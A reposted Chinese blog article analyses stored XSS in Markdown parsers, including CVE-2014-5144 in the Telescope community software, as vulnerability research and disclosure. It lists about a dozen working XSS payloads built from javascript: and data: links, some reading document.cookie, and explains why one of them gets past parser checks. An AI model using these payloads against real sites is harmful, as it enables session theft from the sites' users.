转载

漏洞分析:一个Markdown解析器的持久型XSS漏洞(CVE-2014-5144)

FreeBuf科普:什么是Markdown?

Markdown是一种轻量级的标记语言,流行程度已经得到了GitHub和Stack Overflow的广泛支持,作为普通人我们也可以轻松上手。

用markdown来写文章非常赞,那些琐碎的HTML标签都可以抛到脑后不用管。最近5年内,markdown收到非常多的关注,包括Reddit,Github,StackOverflow在内的很多应用都使用 markdown这也催生了很多的markdown解析器的产生, 这里 定义了一些markdown语法,语法约定markdown解析器将这些标签解析为html标签。

漏洞分析:一个Markdown解析器的持久型XSS漏洞(CVE-2014-5144)

Markdown安全现状

Markdow解析器的安全现状如何?有没有对用户输入的数据做过滤?

事实上,很多markdown解析器都没有过滤用户输入的数据,那么如果markdown被用于添加用户评论等功能的时候,就有可能存在安全风险。

这里有一些关于这个问题的讨论: [1] , [2] , [3] .

另外,如果用googe搜索一下:

markdown xss issue site:github.com

漏洞分析:一个Markdown解析器的持久型XSS漏洞(CVE-2014-5144)

你就会发现github上又很多星级很高的项目都被发现存在XSS 漏洞。

所以,如何构造一些payload呢?看下面这些:

[a](javascript:prompt(document.cookie)) [a](j    a   v   a   s   c   r   i   p   t:prompt(document.cookie)) ![a](javascript:prompt(document.cookie))/ <javascript:prompt(document.cookie)>  <javascript:alert('XSS')>   ![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)/ [a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) [a](javascript:alert('XSS')) ![a'"`onerror=prompt(document.cookie)](x)/ [citelol]: (javascript:prompt(document.cookie)) [notmalicious](javascript:window.onerror=alert;throw%20document.cookie) [test](javascript://%0d%0aprompt(1)) [test](javascript://%0d%0aprompt(1);com)

上面这些payload是由 Aleksa 和原文作者一起搞出来的。在过去的12个月内,在实际渗透测试中证明,上面的这些 payload 是有效的。并且很多 markdown 解析器都受到影响。来看一下最后一个payload: 

[test](javascript://%0d%0aprompt(1);com)

我们猜测,markdown 解析器可能通过如下几个步骤来进行解析&转换:

  1. 判断时候有协议头?//有javascript 伪协议,Y

  2. hostname 是以常见的域名后缀(com, org)结尾的?//是的,以 com 结尾 Y

  3. 将上述 payload 转换为 HTML 标签,//结果如下

<a href="javascript://%0d%0aprompt(1);com>test</a>

成功构造了一个XSS payload!当点击了上述链接后,就会触发XSS!

Telescope解析器一个持久性 XSS 漏洞(CVE-2014-5144)

Telescope 是一个有名的开源项目,类似Reddit和Hackernews一样,提供一个社区功能。Telescope的一个解析帖子&评论的功能存在 XSS 漏洞,并且这个功能存在很久了!

在0.9.3之前的版本中,以上面的 payload 列表中的 payload 发帖或者发表评论,就可以导致一个XSS漏洞。该漏洞已经修复,Telescope在这里发了changelog:http://www.telesc.pe/blog/telescope-v093-dailyscope/

下面是漏洞对应的payload:

[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)

漏洞分析:一个Markdown解析器的持久型XSS漏洞(CVE-2014-5144)

漏洞分析:一个Markdown解析器的持久型XSS漏洞(CVE-2014-5144)

正文到此结束
所属分类: 编程技术

热门推荐

相关文章

阿里云首购8折
说给你听

本文目录
随机标签
书籍教程
springboot-demo Java入门教程 bootstrap3 CSS Apache基础教程 php ionic 教程 Python mysql教程 eclipse Ubuntu VPS系统配置 AngularJS 教程 MongoDB教程 Struts2教程 Redis教程 Spring教程 Git教程 Java设计模式 Jenkins进阶系列 openfire参考指南 HBase教程 Maven教程 hibernate教程 Docker 教程 memcached教程 Quartz指南 Hive教程 ANTLR教程 Ant教程 java实例教程 SpringCloud Elastic-Job-Lite XStream教程 深入浅出MyBatis Hazelcast教程 ibaties教程 SVN教程 rabittmq教程 Hadoop教程 solr教程 WebService CXF学习 springcloud-demo JPA教程 ActiveMQ中文指南 Java内存模型 java-demo dubbo教程 Linux入门视频教程
近期评论
  1. 1 Spring Cloud Circuit Breaker快速入门Demo
  2. 2 Spring Cloud Bus快速入门Demo
  3. 3 Spring Cloud Config快速入门Demo
  4. 4 Spring Cloud Function快速入门Demo
  5. 5 SSPanel-Uim搭建教程 2023年全新定制版主题-解决老版本命令失效问题
  6. 6 Spring Boot集成Milvus和deeplearning4j实现图搜图功能
  7. 7 Spring Boot集成Aviator实现参数校验
  8. 8 ACME自动申请免费的通配符https域名证书
  9. 9 wordpress 数据库和文件优化
  10. 10 CentOS安装Docker与Docker-Compose
网站信息
  • 文章总数:82,696 篇
  • 文件总数:284,257 个
  • 标签总数:2,380 个
  • 分类总数:84 个
  • 留言数量:2,560 条
  • 在线人数:697 人
  • 运行天数:4,393天
  • 最后更新:2024年11月06日01点
Loading...

其他链接

关于本站

本站定位:个人技术类博客

本站作用:写博客、记日志、闲聊扯淡鼓捣技术。

问题交流

[HBLOG]公众号 HBLOG HBLOG